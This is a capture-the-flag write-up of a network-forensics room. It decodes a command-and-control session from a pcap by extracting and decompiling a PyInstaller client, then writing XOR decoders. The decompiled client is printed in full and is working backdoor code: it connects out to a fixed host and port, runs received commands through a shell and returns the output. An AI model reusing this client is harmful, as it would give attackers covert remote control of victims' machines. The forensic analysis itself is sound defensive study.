SeeTwo (THM)

Can you see who is in command and control?

Intro.

Hello fellows, today we have a kind of blue team machine. It looks interesting, so let's get right into it.


Start

First we need to download the zip file, extract the pcap file from it and open it in Wireshark to see what we have.

Searching.

So the first thing that interested me was a conversation in TCP stream 3 which carries base64 data. We will take it one message at a time.

After decoding the data with CyberChef we see an image.

I have decoded all of them but I only found these two images. I am not sure what they mean, but let's set this aside and look somewhere else.

So after a bit more searching I found that an endpoint called /client_base64 had been requested over HTTP.

We can export this object and try to decode it. In Wireshark: File -> Export Objects -> HTTP, select the object and save it to a file.

After saving the file we base64-decode it and find that it is actually a binary executable. Let's use Ghidra to reverse engineer it.

Ghidra did not give me much, so I decided to try another way: running the strings command in Linux on the file shows that it looks like compiled Python, i.e. it carries .pyc files.

Reading a bit in HackTricks we find a tool called pyinstxtractor which extracts the .pyc files from the bundle. Note that we are assuming the file was built with PyInstaller, which is what pyinstxtractor expects.

After that we can use a tool called uncompyle6 to decompile the .pyc file back into a .py file.

This is how we install the tool.

Now let's use it.

 uncompyle6 client.pyc 
# uncompyle6 version 3.9.2
# Python bytecode version base 3.8.0 (3413)
# Decompiled from: Python 3.12.6 (main, Sep  7 2024, 14:20:15) [GCC 14.2.0]
# Embedded file name: client.py
import socket, base64, subprocess, sys
HOST = "10.0.2.64"
PORT = 1337

def xor_crypt(data, key):
    key_length = len(key)
    encrypted_data = []
    for i, byte in enumerate(data):
        encrypted_byte = byte ^ key[i % key_length]
        encrypted_data.append(encrypted_byte)
    else:
        return bytes(encrypted_data)


with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    while True:
        received_data = s.recv(4096).decode("utf-8")
        encoded_image, encoded_command = received_data.split("AAAAAAAAAA")
        key = "MySup3rXoRKeYForCommandandControl".encode("utf-8")
        decrypted_command = xor_crypt(base64.b64decode(encoded_command.encode("utf-8")), key)
        decrypted_command = decrypted_command.decode("utf-8")
        result = subprocess.check_output(decrypted_command, shell=True).decode("utf-8")
        encrypted_result = xor_crypt(result.encode("utf-8"), key)
        encrypted_result_base64 = base64.b64encode(encrypted_result).decode("utf-8")
        separator = "AAAAAAAAAA"
        send = encoded_image + separator + encrypted_result_base64
        s.sendall(send.encode("utf-8"))

After decompiling client.pyc we get this result.

From the code we can see how the channel works. Every message from the C2 server is one string made of three parts: the base64 of an image (the images we saw earlier are just cover traffic), the separator "AAAAAAAAAA", and the base64 of a command that has been XORed with the hard-coded key "MySup3rXoRKeYForCommandandControl". The client splits on the separator, base64-decodes the command, XORs it with the key, executes it with subprocess.check_output(shell=True), XORs the output with the same key, base64-encodes it and sends it back behind the same image and separator. This loops forever. Two things worth noting for the analysis: the key is static and lives in the binary, so anyone with the pcap and the client can read the whole session, and because check_output raises on a non-zero exit status and nothing catches it, a failing command would crash the client. With a bit of Python we can decode every message and recover each command and its result.

import base64

received_data = None
while received_data != "q":
    received_data = input("Enter the data you want to decrypt (q to quit): ")
    if received_data == "q":
        break

    # the same key that is hard-coded in the decompiled client
    key = "MySup3rXoRKeYForCommandandControl".encode("utf-8")

    # message layout is <base64 image> + "AAAAAAAAAA" + <base64 XORed payload>
    encoded_image, encoded_command = received_data.split("AAAAAAAAAA")

    unbased = base64.b64decode(encoded_command.encode("utf-8"))
    key_len = len(key)
    decrypted_data = []
    # XOR is its own inverse, so repeating the client's operation decrypts
    for i, byte in enumerate(unbased):
        decrypted_byte = byte ^ key[i % key_len]
        decrypted_data.append(decrypted_byte)

    result = ''.join(chr(i) for i in decrypted_data)
    print(result)

To reverse the encryption we only need to perform the XOR operation again on the ciphertext with the same key, because XOR with a fixed key is its own inverse: (p ^ k) ^ k = p. The same decoder therefore works for both directions of the stream, the server's commands and the client's responses.
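Rather than pasting messages one at a time, the whole session can be reconstructed at once. The script below is an added example written for this writeup, not code from the room or from the decompiled client; it reuses the client's own key and separator and pairs each server command with the client's reply. The sample traffic at the bottom is constructed here (it is not from the room's pcap) and is deliberately built so that the cover image's base64 contains a run of ten 'A's, because base64 encodes zero bytes as 'A' and a naive split("AAAAAAAAAA") would then return three fields instead of two; the decoder takes the payload after the last separator to avoid that.

```python
import base64

KEY = b"MySup3rXoRKeYForCommandandControl"  # hard-coded in the decompiled client
SEP = "AAAAAAAAAA"                          # the client's field separator (ten 'A's)


def xor_crypt(data: bytes, key: bytes = KEY) -> bytes:
    """Repeating-key XOR. XOR is its own inverse, so this both encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def decode_message(message: str) -> tuple:
    """Split one C2 message into (image_base64, decrypted payload bytes).

    The payload sits after the LAST separator. rpartition is used instead of
    split() because a base64-encoded image can legitimately contain ten
    consecutive 'A's (a run of zero bytes), which would give split() extra fields.
    """
    image_b64, sep, payload_b64 = message.rpartition(SEP)
    if not sep:
        raise ValueError("separator not found: not a complete C2 message")
    return image_b64, xor_crypt(base64.b64decode(payload_b64))


def reconstruct_session(server_msgs: list, client_msgs: list) -> list:
    """Pair each command sent by the server with the client's next reply.

    Output is decoded with errors="replace" so binary command output cannot
    abort the parse. Returns a list of (command, output) strings.
    """
    pairs = []
    for cmd_msg, out_msg in zip(server_msgs, client_msgs):
        _, cmd = decode_message(cmd_msg)
        _, out = decode_message(out_msg)
        pairs.append((cmd.decode("utf-8", errors="replace"),
                      out.decode("utf-8", errors="replace")))
    return pairs


# --- constructed sample traffic (fabricated for this example, not from the pcap) ---
def build_message(image_b64: str, plaintext: bytes) -> str:
    """Fabricate a message in the client's format: image + SEP + base64(xor(payload))."""
    return image_b64 + SEP + base64.b64encode(xor_crypt(plaintext)).decode()


# eight zero bytes in the "image" produce exactly ten consecutive 'A's in base64
FAKE_IMAGE = base64.b64encode(b"\x89PNG" + b"\x00" * 8 + b"end").decode()

SERVER = [build_message(FAKE_IMAGE, b"cat /etc/hostname"),
          build_message(FAKE_IMAGE, b"id")]
CLIENT = [build_message(FAKE_IMAGE, b"victim-box\n"),
          build_message(FAKE_IMAGE, b"uid=0(root) gid=0(root)\n")]

if __name__ == "__main__":
    for cmd, out in reconstruct_session(SERVER, CLIENT):
        print(f"$ {cmd}\n{out}")
```

To feed it real data, dump the two directions of stream 3 from the pcap (for example with Wireshark's Follow TCP Stream, saving each direction separately) and put the server-to-client messages in one list and the client-to-server messages in the other, in capture order; each recv() in the client reads one message, so one message corresponds to one command or one reply.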

What is the first file that is read? Enter the full path of the file.

We can find the answer to the first question here.

What is the output of the file from question 1?

The attacker was able to find some credentials in the file from the first question.

What is the user that the attacker created as a backdoor? Enter the entire line that indicates the user.

Continuing to decrypt the messages, we find the answer to the third question.

What is the name of the backdoor executable?

What is the md5 hash value of the executable from question 4?

What was the first cronjob that was placed by the attacker?

What is the flag?

Final thoughts.

The machine actually was so much fun. It teaches you about compiled Python, how to extract the .pyc files, convert them into .py files, and how to decrypt some data. As for the questions, once you have the decryptor code you just copy and paste the answers. Overall it was soooooooooooooooooooo fun. 😂
